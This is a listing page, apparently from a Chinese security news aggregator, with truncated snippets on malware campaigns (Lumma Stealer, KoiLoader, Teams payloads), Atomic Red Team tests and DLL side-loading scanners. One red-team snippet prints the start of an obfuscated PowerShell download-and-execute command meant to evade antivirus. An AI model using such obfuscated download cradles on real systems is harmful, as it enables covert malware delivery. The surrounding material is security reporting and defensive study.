工具简介@LMcream 师傅投稿分享的一款集成多种安全功能的工具箱,旨在帮助用户快速进行网络排查、主机信息收集、日志查询、IP类处理等安全相关操作。 工具功能1. 网络排查模块: 提取信息:从一键提...
虚假CAPTCHA投递Lumma Stealer窃密木马
近期,360安全大脑监测到一款名为Lumma Stealer的恶意软件传播量呈现出了上升态势,而该恶意软件的传播方式较为特殊——它是利用了虚假的CAPTCHA验证发起攻击。该恶意软件的攻击者采用了精心...
网络威胁升级:新型 KoiLoader 利用 Powershell 脚本规避检测实现恶意软件投放
关键词网络安全网络安全研究人员发现了一场复杂的恶意软件攻击活动,其利用了 KoiLoader 的一个新变种,KoiLoader 是一种模块化的有效载荷交付系统,因分发像 Koi Stealer 这样的...
GitHub 上的投毒攻击事件剖析
Solara Executor 是一款针对 Roblox 平台的脚本执行器,宣称具备卓越的脚本执行能力、出色的性能以及简洁直观的操作界面,还强调与 Roblox 的最新版本完全兼容,为游戏玩家、开发人...
YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击
关键词网络钓鱼一种被称为“Clickflix 技术”的复杂网络钓鱼活动已经出现,它通过看似合法的品牌合作请求瞄准 YouTube 内容创作者。这种新的攻击媒介利用了创作者渴望获得赞助协议的心理,将恶意...
黑客利用 Microsoft Teams 消息丢弃恶意负载
更多全球网络安全资讯尽在邑安全一种复杂的多阶段攻击,威胁行为者利用 Microsoft Teams 提供恶意负载,建立持久性和对公司网络的远程访问。这种新的攻击媒介利用 Teams 作为内部业务应用程...
T1027-混淆文件或信息
Atomic Red Team™是一个映射到MITRE ATT&CK®框架的测试库。安全团队可以使用Atomic Red Team快速、可移植和可重复地测试他们的环境。本文章为Atomic R...
无文件攻击:利用 Powershell 和 Microsoft 合法应用程序
介绍无文件攻击已经存在多年。然而,它们在绕过防病毒软件方面仍然非常有效,并使检测和响应变得更加困难。不仅如此,无文件攻击还使威胁情报变得更加困难,因为它主要依赖于可能从一个版本变为另一个版本的文件哈希...
神兵利器 - 获取可用的DLL:DLLHound
基于 PowerShell 的轻量级扫描程序,旨在识别丢失或未解析的 DLL,帮助您检测 Windows 系统上潜在的 DLL 侧加载漏洞。 特点✨ 动态进程分析🔄 扫描所有正在运行的进程及其加载的 ...
T1006 - 直接卷访问、T1007-系统服务发现
Atomic Red Team™是一个映射到MITRE ATT&CK®框架的测试库。安全团队可以使用Atomic Red Team快速、可移植和可重复地测试他们的环境。本文章为Atomic R...
红队实战 | PowerShell混淆绕过杀软
杀软检测机制 绕过语法 set temp=IEX((((((`N""e^w`-""O""b^j^e""c^t ^N""e""T.""W`e""b""C`l^i`e""n""t))))))."D`own...
DLL侧加载扫描工具
简介 基于 PowerShell 的轻量级扫描工具,专为检测 Windows 系统中的 DLL 侧加载漏洞而设计。通过识别丢失或未解析的 DLL,帮助用户发现潜在安全风险。 特征 •动态进程分析 🔄 ...
65